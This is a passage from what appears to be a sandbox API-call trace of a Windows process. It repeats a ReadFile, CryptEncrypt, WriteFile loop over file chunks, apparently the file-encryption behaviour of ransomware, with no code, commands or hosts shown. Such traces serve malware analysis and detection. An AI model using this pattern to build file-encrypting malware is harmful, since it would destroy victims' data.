hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.475] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.475] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.475] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.476] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.476] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.476] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.476] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.476] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.477] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.477] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.477] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.477] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.477] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.477] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.478] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.478] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.478] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.478] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.478] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.478] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.507] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.507] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.507] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.507] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.507] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.507] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.508] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.508] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.508] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.508] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.508] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.508] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.509] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.509] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.509] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.509] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.509] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.509] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.510] CryptEncrypt (in: hKey=0x2fc3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.510] WriteFile (in: 